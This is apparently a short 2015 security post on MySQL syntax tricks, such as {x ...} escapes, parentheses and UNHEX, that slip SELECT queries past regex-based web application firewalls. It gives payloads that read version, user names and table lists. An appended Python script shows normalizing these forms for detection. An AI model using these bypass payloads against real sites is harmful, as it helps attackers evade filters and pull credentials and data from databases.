
MySQL syntax that bypasses some WAFs

2015-02-12 08:25 (316 views)
select{x table_name}from{x information_schema.tables}


mysql> select{x table_name}from{x information_schema.tables};
+----------------------------------------------------+
| table_name                                         |
+----------------------------------------------------+
| CHARACTER_SETS                                     |
| COLLATIONS                                         |
| COLLATION_CHARACTER_SET_APPLICABILITY              |
| COLUMNS                                            |
| COLUMN_PRIVILEGES                                  |
| ENGINES                                            |


mysql> select{x version()}from{x user};
+---------------+
| {x version()} |
+---------------+
| 5.5.20-log    |
| 5.5.20-log    |
| 5.5.20-log    |
| 5.5.20-log    |
+---------------+
4 rows in set (0.00 sec)


select{x a}from{x b}: b is any table name that exists in the current database, and a is whatever you want returned. The scenario I can think of is fetching things like user() and version(), with {} standing in for spaces to get past regex-based detection. Then again, select{x (user())} or select(user()) also work directly.
To retrieve other information, do it like this.

mysql> select{x (select user from user limit 1)} from{x user};
+-------------------------------------+
| {x (select user from user limit 1)} |
+-------------------------------------+
| root                                |
| root                                |
| root                                |
| root


mysql> select{x(name)}from{x(manager)};
+--------+
| name   |
+--------+
| admin  |
+--------+
1 row in set (0.00 sec)


You can play it this way and drop the spaces:

just use parentheses directly, isn't that enough!

such as:
select(host)from(mysql.user);
SELECT(UNHEX(UNHEX(333532453335324533323335)));


Some WAF rule sets can still match the plain-parentheses form, so:

select{x+table_name}from{x(information_schema.tables)}
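As an added example (not part of the original post), the following Python script shows, from the detection side, why a WAF rule that expects whitespace between SELECT and FROM misses every form shown above, and how normalizing brace, parenthesis and plus characters (and URL encoding) before matching closes that gap. The weak rule and the sample request strings are assumptions constructed for this demonstration, not rules from any real WAF.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request parameters: the post's whitespace-free forms,
# one ordinary SQL statement and one benign string.
SAMPLES = [
    "select{x table_name}from{x information_schema.tables}",
    "select{x version()}from{x user}",
    "select(host)from(mysql.user)",
    "select{x+table_name}from{x(information_schema.tables)}",
    "select * from products where id=1",
    "hello world",
]

# Assumed weak rule: requires at least one whitespace character between
# SELECT, the column list and FROM, which is exactly what the {} and ()
# forms avoid.
NAIVE_RULE = re.compile(r"\bselect\s+.+?\s+from\s+", re.IGNORECASE)

# Hardened rule: after normalization only keyword order matters.
NORMALIZED_RULE = re.compile(r"\bselect\b.*\bfrom\b", re.IGNORECASE)


def naive_match(value: str) -> bool:
    """Apply the whitespace-dependent rule to a URL-decoded value."""
    return bool(NAIVE_RULE.search(unquote_plus(value)))


def normalize(value: str) -> str:
    """URL-decode, lowercase and collapse every brace, parenthesis, plus sign
    and whitespace run into a single space, so that the ODBC-style
    {ident expr} escape and the (expr) wrapper no longer glue keywords together."""
    decoded = unquote_plus(value).lower()
    return re.sub(r"[{}()+\s]+", " ", decoded)


def normalized_match(value: str) -> bool:
    """Apply the keyword-order rule to the normalized value."""
    return bool(NORMALIZED_RULE.search(normalize(value)))


def evaluate(samples=SAMPLES):
    """Return (sample, naive_hit, normalized_hit) for each sample."""
    return [(s, naive_match(s), normalized_match(s)) for s in samples]


if __name__ == "__main__":
    for sample, naive, normalized in evaluate():
        print(f"naive={naive!s:5}  normalized={normalized!s:5}  {sample}")
```

Running the script shows the naive rule firing only on the ordinary `select * from products ...` statement while the normalized rule fires on all five SQL samples and stays quiet on the benign one. The normalization is deliberately coarse: a WAF is a tokenizer-free filter, so mapping every delimiter MySQL accepts between keywords onto a single space is more robust than enumerating bypass spellings.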

https://twitter.com/Black2Fan/status/564746640138182656
http://dev.mysql.com/doc/refman/5.6/en/date-and-time-literals.html#date-and-time-standard-sql-literals
http://dev.mysql.com/doc/refman/5.6/en/join.html#idm140714470997024